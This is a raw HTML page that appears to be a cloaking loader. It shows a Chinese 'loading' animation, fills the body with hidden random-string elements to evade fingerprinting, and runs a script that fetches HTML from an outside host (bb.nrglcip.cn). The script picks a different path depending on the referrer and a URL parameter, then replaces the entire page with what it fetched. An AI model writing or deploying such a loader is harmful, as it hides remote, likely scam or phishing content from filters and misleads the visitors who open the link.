<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ajuigCDr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ajuigCDr .Y4LquPJz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ajuigCDr .content {
            line-height: 50px;
            text-align: center
        }

        .ajuigCDr .img {
            width: 100%
        }

        .ajuigCDr .LSOsKSPLi {
            text-align: center
        }

        .ajuigCDr .LSOsKSPLi span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ajuigCDr .LSOsKSPLi span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ajuigCDr .LSOsKSPLi span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ajuigCDr .LSOsKSPLi span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ajuigCDr .LSOsKSPLi span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ajuigCDr .LSOsKSPLi span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ajuigCDr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MM7bHTGaA(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RlX8VQ = MM7bHTGaA('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RlX8VQ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RlX8VQ +".html?a=share";
		}
		
        fHG0jI=url+"#"+new Date().getTime();
        fHG0jI && function() {
            $.get(fHG0jI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Fbpr4r4slea8oj8jCwa37POMW98qXDwVWKK7lKZkFvKkATXQw4pwVwFkGeLCER9ykDDycP6IwtPzxoEnoNrfuWnP</b>
<b style='display:none' >Fbpr4r4slea8oj8jCwa37POMW98qXDwVWKK7lKZkFvKkATXQw4pwVwFkGeLCER9ykDDycP6IwtPzxoEnoNrfuWnP</b>
<div style='display:none'>xW5pNw4gUM3w0Wt9Vt1WyJDmWPITF5ONqMTAUyn2HHTNQ9Gw01Z</div>
<span style='display:none'>LRDqK9Li2g1sTnuHGQjzmmhMwrqYeE3FH7XY8IMtmjA3CgB6eJy5DOYvIq</span>
<b style='display:none' >Fbpr4r4slea8oj8jCwa37POMW98qXDwVWKK7lKZkFvKkATXQw4pwVwFkGeLCER9ykDDycP6IwtPzxoEnoNrfuWnP</b>
<h1 style='display:none' >d7PLX7mlW4sCyZFpnfZCf6Ime7GDsYu2X7YygThAxhjOecdOWuzrx9TVynFlQDCGbYxIAWeVJLoFC5WPAvEXoeWD8qljBrs</h1>
<h1 style='display:none' >d7PLX7mlW4sCyZFpnfZCf6Ime7GDsYu2X7YygThAxhjOecdOWuzrx9TVynFlQDCGbYxIAWeVJLoFC5WPAvEXoeWD8qljBrs</h1>
<a  href='#' style='display:none'>uBOU2nHP2yhxw8oTzxAy0ogfNNT9ZPgyHImjuBdDs6YDoBkE2NH5UyTuNt8ocwUiTkrzYkEixpFIAfBJSLupm0Dxr</a>
<li style='display:none' >clWYie1LC5KoTGZCjISH8</li><div class="ajuigCDr">
    <div class="Y4LquPJz">
        <div class="LSOsKSPLi">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>tQu9Hsr9Z8uBuhfkgH17NrVkdqBeOr9M</div>
<li style='display:none' >daPEr9ohNmjydIkQ8YFt0DM0dWsvitvMeevJ2heTW7f0HmlaVmQzMCilnE3AFFvEUZUu</li>
<h1 style='display:none' >gHydMPmE17J8B87wdrRFNsEYSSEIStv6Ah6MNwRAHacKeylxAe8MdfgE0cf3JdxpyakCMV</h1>
<img  src='' style='display:none'>
<div style='display:none'>tQu9Hsr9Z8uBuhfkgH17NrVkdqBeOr9M</div>
<img  src='' style='display:none'>
<div style='display:none'>tQu9Hsr9Z8uBuhfkgH17NrVkdqBeOr9M</div>
<li style='display:none' >daPEr9ohNmjydIkQ8YFt0DM0dWsvitvMeevJ2heTW7f0HmlaVmQzMCilnE3AFFvEUZUu</li>
<p  style='display:none'>qdUsiNB1K6iww3y9TO6CycsUpNO0kSxjwIZW9gmHRj9rHOtQkj76c07foaUZBBRIlgK2</p>
<span style='display:none'>su4cUrQWXw9deGM0gavKMvExGfeitjStrATKWdNOIq4vNnT6S5Z</span></body>
</html>